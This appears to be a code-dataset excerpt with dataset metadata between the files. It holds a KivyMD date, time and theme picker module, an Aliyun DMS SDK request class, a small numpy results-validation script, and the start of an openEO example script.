pos_hint: {'center_x': .5, 'center_y': .5}
on_release: app.show_time_picker()
'''
class Test(MDApp):
def build(self):
return Builder.load_string(KV)
def show_time_picker(self):
'''Open time picker dialog.'''
time_dialog = MDTimePicker()
time_dialog.open()
Test().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDTimePicker.gif
:align: center
Binding method returning set time
---------------------------------
.. code-block:: python
def show_time_picker(self):
time_dialog = MDTimePicker()
time_dialog.bind(time=self.get_time)
time_dialog.open()
def get_time(self, instance, time):
'''
The method returns the set time.
:type instance: <kivymd.uix.picker.MDTimePicker object>
:type time: <class 'datetime.time'>
'''
return time
Open time dialog with the specified time
----------------------------------------
Use the :attr:`~MDTimePicker.set_time` method of the
:class:`~MDTimePicker.` class.
.. code-block:: python
def show_time_picker(self):
from datetime import datetime
# Must be a datetime object
previous_time = datetime.strptime("03:20:00", '%H:%M:%S').time()
time_dialog = MDTimePicker()
time_dialog.set_time(previous_time)
time_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/previous-time.png
:align: center
.. _MDDatePicker:
MDDatePicker
------------
When creating an instance of the :class:`~MDDatePicker` class, you must pass
as a parameter a method that will take one argument - a ``datetime`` object.
.. code-block:: python
def get_date(self, date):
'''
:type date: <class 'datetime.date'>
'''
def show_date_picker(self):
date_dialog = MDDatePicker(callback=self.get_date)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDDatePicker.gif
:align: center
Open date dialog with the specified date
----------------------------------------
.. code-block:: python
def show_date_picker(self):
date_dialog = MDDatePicker(
callback=self.get_date,
year=2010,
month=2,
day=12,
)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/previous-date.png
:align: center
You can set the time interval from and to the set date. All days of the week
that are not included in this range will have the status `disabled`.
.. code-block:: python
def show_date_picker(self):
min_date = datetime.strptime("2021:02:15", '%Y:%m:%d').date()
max_date = datetime.strptime("2021:02:20", '%Y:%m:%d').date()
date_dialog = MDDatePicker(
callback=self.get_date,
min_date=min_date,
max_date=max_date,
)
date_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/range-date.png
:align: center
.. _MDThemePicker:
MDThemePicker
-------------
.. code-block:: python
def show_theme_picker(self):
theme_dialog = MDThemePicker()
theme_dialog.open()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/MDThemePicker.gif
:align: center
"""
__all__ = ("MDTimePicker", "MDDatePicker", "MDThemePicker")
import calendar
import datetime
from datetime import date
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.properties import (
BooleanProperty,
ColorProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.modalview import ModalView
from kivy.utils import get_color_from_hex
from kivymd.color_definitions import colors, palette
from kivymd.theming import ThemableBehavior
from kivymd.uix.behaviors import (
CircularRippleBehavior,
RectangularElevationBehavior,
SpecificBackgroundColorBehavior,
)
from kivymd.uix.button import MDIconButton
from kivymd.uix.label import MDLabel
Builder.load_string(
"""
#:import calendar calendar
#:import platform platform
#:import images_path kivymd.images_path
<MDDatePicker>
background: "{}/transparent.png".format(images_path)
cal_layout: cal_layout
size_hint: (None, None)
size:
(dp(328), dp(484)) \
if self.theme_cls.device_orientation == "portrait" \
else (dp(512), dp(304))
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
RoundedRectangle:
size:
(dp(328), dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else (dp(168), dp(304))
pos:
(root.pos[0], root.pos[1] + root.height - dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else (root.pos[0], root.pos[1] + root.height - dp(304))
radius: [root.radius[0], root.radius[1], dp(0), dp(0)] \
if self.theme_cls.device_orientation == "portrait" \
else [root.radius[0], dp(0), dp(0), root.radius[3]]
Color:
rgb: app.theme_cls.bg_normal
RoundedRectangle:
size:
(dp(328), dp(484) - dp(96)) \
if self.theme_cls.device_orientation == "portrait" \
else [dp(344), dp(304)]
pos:
(root.pos[0], root.pos[1] + root.height - dp(96) - (dp(484) - dp(96))) \
if self.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(168), root.pos[1])
radius: [dp(0), dp(0), root.radius[2], root.radius[3]] \
if self.theme_cls.device_orientation == "portrait" \
else [dp(0), root.radius[1], root.radius[2], dp(0)]
MDLabel:
id: label_full_date
font_style: "H4"
text_color: root.specific_text_color
theme_text_color: "Custom"
size_hint: (None, None)
size:
(root.width, dp(30)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(168), dp(30))
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height - dp(74)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(3), root.pos[1] + dp(214))
line_height: .84
valign: "middle"
text_size:
(root.width, None) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(149), None)
bold: True
text:
root.fmt_lbl_date(root.sel_year, root.sel_month, root.sel_day, \
root.theme_cls.device_orientation)
MDLabel:
id: label_year
font_style: "Subtitle1"
text_color: root.specific_text_color
theme_text_color: "Custom"
size_hint: (None, None)
size: root.width, dp(30)
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height - dp(40)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(16), root.pos[1] + root.height - dp(41))
valign: "middle"
text: str(root.sel_year)
GridLayout:
id: cal_layout
cols: 7
size:
(dp(44 * 7), dp(40 * 7)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(46 * 7), dp(32 * 7))
col_default_width:
dp(42) if root.theme_cls.device_orientation == "portrait" \
else dp(39)
size_hint: (None, None)
padding:
(dp(2), 0) if root.theme_cls.device_orientation == "portrait" \
else (dp(7), 0)
spacing:
(dp(2), 0) if root.theme_cls.device_orientation == "portrait" \
else (dp(7), 0)
pos:
(root.pos[0] + dp(10), root.pos[1] + dp(60)) \
if root.theme_cls.device_orientation == "portrait" \
else (root.pos[0] + dp(168) + dp(8), root.pos[1] + dp(48))
MDLabel:
id: label_month_selector
font_style: "Body2"
text: calendar.month_name[root.month].capitalize() + " " + str(root.year)
size_hint: (None, None)
size: root.width, dp(30)
pos: root.pos
pos_hint:
{"center_x": .5, "center_y": .75} \
if self.theme_cls.device_orientation == "portrait" \
else {"center_x": .67, "center_y": .915}
valign: "middle"
halign: "center"
MDIconButton:
icon: "chevron-left"
theme_text_color: "Secondary"
pos_hint:
{"center_x": .08, "center_y": .745} \
if root.theme_cls.device_orientation == "portrait" \
else {"center_x": .39, "center_y": .925}
on_release: root.change_month("prev")
MDIconButton:
icon: "chevron-right"
theme_text_color: "Secondary"
pos_hint:
{"center_x": .92, "center_y": .745} \
if root.theme_cls.device_orientation == "portrait" \
else {"center_x": .94, "center_y": .925}
on_release: root.change_month("next")
MDFlatButton:
width: dp(32)
id: ok_button
pos: root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "OK"
on_release: root.ok_click()
MDFlatButton:
id: cancel_button
pos: root.pos[0] + root.size[0] - self.width - ok_button.width - dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.dismiss()
<DayButton>
size_hint: None, None
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
MDLabel:
font_style: "Caption"
theme_text_color: "Custom" if root.is_today and not root.is_selected else "Primary"
text_color: root.theme_cls.primary_color
opposite_colors:
root.is_selected if root.owner.sel_month == root.owner.month \
and root.owner.sel_year == root.owner.year \
and str(self.text) == str(root.owner.sel_day) else False
size_hint_x: None
valign: "middle"
halign: "center"
text: root.text
<WeekdayLabel>
font_style: "Caption"
theme_text_color: "Secondary"
size: (dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
size_hint: None, None
text_size: self.size
valign:
"middle" if root.theme_cls.device_orientation == "portrait" \
else "bottom"
halign: "center"
<DaySelector>
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
size_hint: (None, None)
canvas:
Color:
rgba: self.theme_cls.primary_color if self.shown else [0, 0, 0, 0]
Ellipse:
size:
(dp(40), dp(40)) \
if root.theme_cls.device_orientation == "portrait" \
else (dp(32), dp(32))
pos:
self.pos if root.theme_cls.device_orientation == "portrait" \
else (self.pos[0], self.pos[1])
"""
)
class DaySelector(ThemableBehavior, AnchorLayout):
shown = BooleanProperty(False)
def __init__(self, parent):
super().__init__()
self.parent_class = parent
self.parent_class.add_widget(self, index=7)
self.selected_widget = None
Window.bind(on_resize=self.move_resize)
def update(self):
parent = self.parent_class
if parent.sel_month == parent.month and parent.sel_year == parent.year:
self.shown = True
else:
self.shown = False
def set_widget(self, widget):
self.selected_widget = widget
self.pos = widget.pos
self.move_resize(do_again=True)
self.update()
def move_resize(self, window=None, width=None, height=None, do_again=True):
self.pos = self.selected_widget.pos
if do_again:
Clock.schedule_once(
lambda x: self.move_resize(do_again=False), 0.01
)
class DayButton(
ThemableBehavior, CircularRippleBehavior, ButtonBehavior, AnchorLayout
):
text = StringProperty()
owner = ObjectProperty()
is_today = BooleanProperty(False)
is_selected = BooleanProperty(False)
def on_release(self):
self.owner.set_selected_widget(self)
class WeekdayLabel(MDLabel):
pass
class MDDatePicker(
FloatLayout,
ThemableBehavior,
RectangularElevationBehavior,
SpecificBackgroundColorBehavior,
ModalView,
):
_sel_day_widget = ObjectProperty()
cal_list = None
cal_layout = ObjectProperty()
sel_year = NumericProperty()
sel_month = NumericProperty()
sel_day = NumericProperty()
day = NumericProperty()
month = NumericProperty()
year = NumericProperty()
today = date.today()
callback = ObjectProperty()
background_color = ColorProperty([0, 0, 0, 0.7])
class SetDateError(Exception):
pass
def __init__(
self,
callback,
year=None,
month=None,
day=None,
firstweekday=0,
min_date=None,
max_date=None,
**kwargs,
):
self.callback = callback
self.cal = calendar.Calendar(firstweekday)
self.sel_year = year if year else self.today.year
self.sel_month = month if month else self.today.month
self.sel_day = day if day else self.today.day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.min_date = min_date
self.max_date = max_date
super().__init__(**kwargs)
self.selector = DaySelector(parent=self)
self.generate_cal_widgets()
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def ok_click(self):
self.callback(date(self.sel_year, self.sel_month, self.sel_day))
self.dismiss()
def fmt_lbl_date(self, year, month, day, orientation):
d = datetime.date(int(year), int(month), int(day))
separator = "\n" if orientation == "landscape" else " "
return (
d.strftime("%a,").capitalize()
+ separator
+ d.strftime("%b").capitalize()
+ " "
+ str(day).lstrip("0")
)
def set_date(self, year, month, day):
try:
date(year, month, day)
except Exception as e:
if str(e) == "day is out of range for month":
raise self.SetDateError(
" Day %s day is out of range for month %s" % (day, month)
)
elif str(e) == "month must be in 1..12":
raise self.SetDateError(
"Month must be between 1 and 12, got %s" % month
)
elif str(e) == "year is out of range":
raise self.SetDateError(
"Year must be between %s and %s, got %s"
% (datetime.MINYEAR, datetime.MAXYEAR, year)
)
else:
self.sel_year = year
self.sel_month = month
self.sel_day = day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def set_selected_widget(self, widget):
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
widget.is_selected = True
self.sel_month = int(self.month)
self.sel_year = int(self.year)
self.sel_day = int(widget.text)
self._sel_day_widget = widget
self.selector.set_widget(widget)
def set_month_day(self, day):
for idx in range(len(self.cal_list)):
if str(day) == str(self.cal_list[idx].text):
self._sel_day_widget = self.cal_list[idx]
self.sel_day = int(self.cal_list[idx].text)
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
self._sel_day_widget = self.cal_list[idx]
self.cal_list[idx].is_selected = True
self.selector.set_widget(self.cal_list[idx])
def update_cal_matrix(self, year, month):
try:
dates = [x for x in self.cal.itermonthdates(year, month)]
except ValueError as e:
if str(e) == "year is out of range":
pass
else:
self.year = year
self.month = month
for idx in range(len(self.cal_list)):
if idx >= len(dates) or dates[idx].month != month:
self.cal_list[idx].disabled = True
self.cal_list[idx].text = ""
else:
if self.min_date and self.max_date:
self.cal_list[idx].disabled = (
True
if (
dates[idx] < self.min_date
or dates[idx] > self.max_date
)
else False
)
elif self.min_date:
if isinstance(self.min_date, date):
self.cal_list[idx].disabled = (
True if dates[idx] < self.min_date else False
)
else:
raise ValueError(
"min_date must be of type {} or None, got {}".format(
date, type(self.min_date)
)
)
elif self.max_date:
if isinstance(self.max_date, date):
self.cal_list[idx].disabled = (
True if dates[idx] > self.max_date else False
)
else:
raise ValueError(
"max_date must be of type {} or None, got {}".format(
                                date, type(self.max_date)
)
)
else:
self.cal_list[idx].disabled = False
self.cal_list[idx].text = str(dates[idx].day)
self.cal_list[idx].is_today = dates[idx] == self.today
self.selector.update()
def generate_cal_widgets(self):
cal_list = []
for day in self.cal.iterweekdays():
self.cal_layout.add_widget(
WeekdayLabel(text=calendar.day_abbr[day][0].upper())
)
for i in range(6 * 7): # 6 weeks, 7 days a week
db = DayButton(owner=self)
cal_list.append(db)
self.cal_layout.add_widget(db)
self.cal_list = cal_list
    def change_month(self, operation):
        # Step one month forward or back, wrapping December <-> January
        # and adjusting the year at the wrap points.
        op = 1 if operation == "next" else -1
        sl, sy = self.month, self.year
        m = 12 if sl + op == 0 else 1 if sl + op == 13 else sl + op
        y = sy - 1 if sl + op == 0 else sy + 1 if sl + op == 13 else sy
        self.update_cal_matrix(y, m)
Builder.load_string(
"""
#:import CircularTimePicker kivymd.vendor.circularTimePicker.CircularTimePicker
#:import dp kivy.metrics.dp
<MDTimePicker>
size_hint: (None, None)
size: (dp(270), dp(335) + dp(95))
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgba: self.theme_cls.bg_light
RoundedRectangle:
size: (dp(270), dp(335))
pos: (root.pos[0], root.pos[1] + root.height - dp(335) - dp(95))
radius: [dp(0), dp(0), root.radius[2], root.radius[3]]
Color:
rgba: self.theme_cls.primary_color
RoundedRectangle:
size: (dp(270), dp(95))
pos: (root.pos[0], root.pos[1] + root.height - dp(95))
radius: [root.radius[0], root.radius[1], dp(0), dp(0)]
Color:
rgba: self.theme_cls.bg_dark
Ellipse:
size: (dp(220), dp(220))
pos:
root.pos[0] + dp(270) / 2 - dp(220) / 2, root.pos[1] \
+ root.height - (dp(335) / 2 + dp(95)) - dp(220) / 2 + dp(35)
CircularTimePicker:
id: time_picker
pos: (dp(270) / 2) - (self.width / 2), root.height - self.height
size_hint: (.8, .8)
pos_hint: {"center_x": .5, "center_y": .585}
military: root.military
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] - self.width - dp(10), \
root.pos[1] + dp(10)
text: "OK"
on_release: root.close_ok()
MDFlatButton:
id: cancel_button
pos:
root.pos[0] + root.size[0] - self.width - ok_button.width \
- dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.close_cancel()
"""
)
class MDTimePicker(
ThemableBehavior, FloatLayout, ModalView, RectangularElevationBehavior
):
time = ObjectProperty()
"""
    User's callback property. A method bound to it must take two parameters:
.. code-block:: python
def get_time(self, instance, time):
'''
The method returns the set time.
:type instance: <kivymd.uix.picker.MDTimePicker object>
:type time: <class 'datetime.time'>
'''
return time
:attr:`time` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `None`.
"""
radius = ListProperty([0, 0, 0, 0])
"""
Corner radius values.
:attr:`radius` is an :class:`~kivy.properties.ListProperty`
    and defaults to `[0, 0, 0, 0]`.
"""
military = BooleanProperty(False)
"""
24H Mode.
:attr:`military` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.current_time = self.ids.time_picker.time
def set_time(self, time):
"""
Sets user time.
:type time: <class 'datetime.time'>
"""
try:
self.ids.time_picker.set_time(time)
except AttributeError:
raise TypeError(
"MDTimePicker._set_time must receive a datetime object, "
'not a "' + type(time).__name__ + '"'
)
def close_cancel(self):
self.dismiss()
def close_ok(self):
self.current_time = self.ids.time_picker.time
self.time = self.current_time
self.dismiss()
Builder.load_string(
"""
<Tab@BoxLayout+MDTabsBase>
<ColorSelector>
size: dp(40), dp(40)
pos: self.pos
size_hint: (None, None)
canvas:
Color:
rgba: root.rgb_hex(root.color_name)
Ellipse:
size: self.size
pos: self.pos
<AccentColorSelector@ColorSelector>
on_release: app.theme_cls.accent_palette = root.color_name
<PrimaryColorSelector@ColorSelector>
on_release: app.theme_cls.primary_palette = root.color_name
<MDThemePicker>
size_hint: (None, None)
size: dp(284), dp(120) + dp(290)
pos_hint: {"center_x": .5, "center_y": .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
RoundedRectangle:
size: self.width, dp(120)
pos: root.pos[0], root.pos[1] + root.height - dp(120)
radius: [root.radius[0], root.radius[1], dp(0), dp(0)]
Color:
rgb: app.theme_cls.bg_normal
RoundedRectangle:
size: self.width, dp(290)
pos: root.pos[0], root.pos[1] + root.height - (dp(120) + dp(290))
radius: [dp(0), dp(0), root.radius[2], root.radius[3]]
MDFlatButton:
id: close_button
pos: root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "Close"
on_release: root.dismiss()
MDLabel:
id: title
font_style: "H5"
text: "Change theme"
size_hint: (None, None)
size: dp(160), dp(50)
pos_hint: {"center_x": .5, "center_y": .9}
theme_text_color: "Custom"
text_color: root.specific_text_color
MDTabs:
size_hint: (None, None)
size: root.width, root.height - dp(135)
pos_hint: {"center_x": .5, "center_y": .475}
id: tab_panel
Tab:
id: theme_tab
text: "Theme"
BoxLayout:
spacing: dp(4)
padding: dp(4)
size_hint: (None, None)
size: dp(270), root.height # -dp(120)
pos_hint: {"center_x": .532, "center_y": .89}
orientation: "vertical"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
PrimaryColorSelector:
color_name: "Red"
BoxLayout:
PrimaryColorSelector:
color_name: "Pink"
BoxLayout:
PrimaryColorSelector:
color_name: "Purple"
BoxLayout:
PrimaryColorSelector:
color_name: "DeepPurple"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
PrimaryColorSelector:
color_name: "Indigo"
BoxLayout:
PrimaryColorSelector:
color_name: "Blue"
BoxLayout:
PrimaryColorSelector:
color_name: "LightBlue"
BoxLayout:
PrimaryColorSelector:
color_name: "Cyan"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Teal"
BoxLayout:
PrimaryColorSelector:
color_name: "Green"
BoxLayout:
PrimaryColorSelector:
color_name: "LightGreen"
BoxLayout:
PrimaryColorSelector:
color_name: "Lime"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
orientation: "horizontal"
halign: "center"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Yellow"
BoxLayout:
PrimaryColorSelector:
color_name: "Amber"
BoxLayout:
PrimaryColorSelector:
color_name: "Orange"
BoxLayout:
PrimaryColorSelector:
color_name: "DeepOrange"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
#pos: self.pos
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
PrimaryColorSelector:
color_name: "Brown"
BoxLayout:
PrimaryColorSelector:
color_name: "Gray"
BoxLayout:
PrimaryColorSelector:
color_name: "BlueGray"
BoxLayout:
MDIconButton:
size: dp(40), dp(40)
size_hint: (None, None)
canvas:
Color:
rgba: app.theme_cls.bg_normal
Ellipse:
size: self.size
pos: self.pos
disabled: True
Tab:
id: accent_tab
text: "Accent"
BoxLayout:
spacing: dp(4)
padding: dp(4)
size_hint: (None, None)
size: dp(270), root.height # -dp(120)
pos_hint: {"center_x": .532, "center_y": .89}
orientation: "vertical"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
AccentColorSelector:
color_name: "Red"
BoxLayout:
AccentColorSelector:
color_name: "Pink"
BoxLayout:
AccentColorSelector:
color_name: "Purple"
BoxLayout:
AccentColorSelector:
color_name: "DeepPurple"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
BoxLayout:
AccentColorSelector:
color_name: "Indigo"
BoxLayout:
AccentColorSelector:
color_name: "Blue"
BoxLayout:
AccentColorSelector:
color_name: "LightBlue"
BoxLayout:
AccentColorSelector:
color_name: "Cyan"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
halign: "center"
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Teal"
BoxLayout:
AccentColorSelector:
color_name: "Green"
BoxLayout:
AccentColorSelector:
color_name: "LightGreen"
BoxLayout:
AccentColorSelector:
color_name: "Lime"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
pos: self.pos
orientation: "horizontal"
halign: "center"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Yellow"
BoxLayout:
AccentColorSelector:
color_name: "Amber"
BoxLayout:
AccentColorSelector:
color_name: "Orange"
BoxLayout:
AccentColorSelector:
color_name: "DeepOrange"
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .5}
size: dp(230), dp(40)
#pos: self.pos
orientation: "horizontal"
padding: 0, 0, 0, dp(1)
BoxLayout:
AccentColorSelector:
color_name: "Brown"
BoxLayout:
AccentColorSelector:
color_name: "Gray"
BoxLayout:
AccentColorSelector:
color_name: "BlueGray"
BoxLayout:
MDIconButton:
size: dp(40), dp(40)
size_hint: (None, None)
canvas:
Color:
rgba: app.theme_cls.bg_normal
Ellipse:
size: self.size
pos: self.pos
disabled: True
Tab:
id: style_tab
text: "Style"
FloatLayout:
size: self.size
pos: self.pos
BoxLayout:
size_hint: (None, None)
pos_hint: {"center_x": .5, "center_y": .6}
halign: "center"
valign: "center"
spacing: dp(10)
width: dp(210)
height: dp(100)
MDIconButton:
size: dp(100), dp(100)
size_hint: (None, None)
canvas:
Color:
rgba: 1, 1, 1, 1
Ellipse:
size: self.size
pos: self.pos
Color:
rgba: 0, 0, 0, 1
Line:
width: 1.
circle: (self.center_x, self.center_y, dp(50))
on_release: app.theme_cls.theme_style = "Light"
MDIconButton:
size: dp(100), dp(100)
pos: self.pos
size_hint: (None, None)
canvas:
Color:
rgba: 0, 0, 0, 1
Ellipse:
size: self.size
pos: self.pos
on_release: app.theme_cls.theme_style = "Dark"
"""
)
class ColorSelector(MDIconButton):
color_name = OptionProperty("Indigo", options=palette)
def rgb_hex(self, col):
return get_color_from_hex(colors[col][self.theme_cls.accent_hue])
class MDThemePicker(
ThemableBehavior,
FloatLayout,
ModalView,
SpecificBackgroundColorBehavior,
RectangularElevationBehavior,
):
pass
| 32.477312
| 101
| 0.494935
|
4a18a2a813e89d2ad894cff5004a0d031e39fd9d
| 2,266
|
py
|
Python
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-dms-enterprise/aliyunsdkdms_enterprise/request/v20181101/CreateDataCronClearOrderRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdms_enterprise.endpoint import endpoint_data
import json
class CreateDataCronClearOrderRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'dms-enterprise', '2018-11-01', 'CreateDataCronClearOrder','dms-enterprise')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Tid(self): # Long
return self.get_query_params().get('Tid')
def set_Tid(self, Tid): # Long
self.add_query_param('Tid', Tid)
def get_AttachmentKey(self): # String
return self.get_query_params().get('AttachmentKey')
def set_AttachmentKey(self, AttachmentKey): # String
self.add_query_param('AttachmentKey', AttachmentKey)
def get_Param(self): # Struct
return self.get_query_params().get('Param')
def set_Param(self, Param): # Struct
self.add_query_param("Param", json.dumps(Param))
def get_Comment(self): # String
return self.get_query_params().get('Comment')
def set_Comment(self, Comment): # String
self.add_query_param('Comment', Comment)
def get_RelatedUserList(self): # Array
return self.get_query_params().get('RelatedUserList')
def set_RelatedUserList(self, RelatedUserList): # Array
self.add_query_param("RelatedUserList", json.dumps(RelatedUserList))
| 37.766667
| 105
| 0.75684
|
4a18a2b5a3a2d04907f74754b61ae090b17ff447
| 584
|
py
|
Python
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 82
|
2021-07-20T02:45:54.000Z
|
2022-03-14T07:08:45.000Z
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 4
|
2021-11-25T13:39:21.000Z
|
2022-03-13T04:14:14.000Z
|
examples/runner/parallel/validate_results.py
|
zpxbjdx/Hetu
|
e84b6436b668e56b4e97a5fcc2ced08780f2a3c3
|
[
"Apache-2.0"
] | 13
|
2021-07-18T14:40:56.000Z
|
2022-03-09T06:37:42.000Z
|
import numpy as np
import os.path as osp
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser()
    parser.add_argument('number', type=int)
parser.add_argument('--rtol', default='1e-6')
args = parser.parse_args()
directory = 'results'
base = np.load(osp.join(directory, 'base.npy'))
print('Ground truth:', base)
    for i in range(args.number):
res = np.load(osp.join(directory, 'res%d.npy' % i))
np.testing.assert_allclose(base, res, rtol=float(args.rtol))
print('Result id %d passed test.' % i, res)
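Invocation sketch, following the script's own results/ naming convention:

# python validate_results.py 4 --rtol 1e-5
# compares results/res0.npy ... results/res3.npy against results/base.npy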
| 32.444444
| 68
| 0.652397
|
4a18a2dd8c98ffad58f2b364cd3d1d9c8c813dce
| 5,176
|
py
|
Python
|
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
examples/py3_process_wrapper-wcps_eurac.py
|
ghtmtt/openeo-python-client
|
9277941574d3ba839562c650e2530b51f29640a2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import json
import logging
from datetime import datetime
import openeo
from openeo.rest.imagecollectionclient import ImageCollectionClient
import sys
logger = logging.getLogger(__name__)
def execute(
out_dir,
user,
password,
provider,
driver_url,
image_collection,
all_bands,
bands,
band_format,
bbox_string,
temporal_extent,
):
"""
Identification:
Name -- OpenEO PoC
Description -- Retrieve Sentinel 2 bands in GeoTIFF
Version -- 1-hbo
Author -- Alexander Jacob, Eurac Research, openEO
Mission -- hackathon
Inputs:
user -- User -- 45/User String -- guest
password -- Password -- 45/User String -- guest_123
provider -- Provider -- 45/User String -- Eurac Research
driver_url -- Driver URL -- 45/User String -- https://openeo.eurac.edu
image_collection -- Image Collection -- 45/User String -- S2_L2A_T32TPS_20M
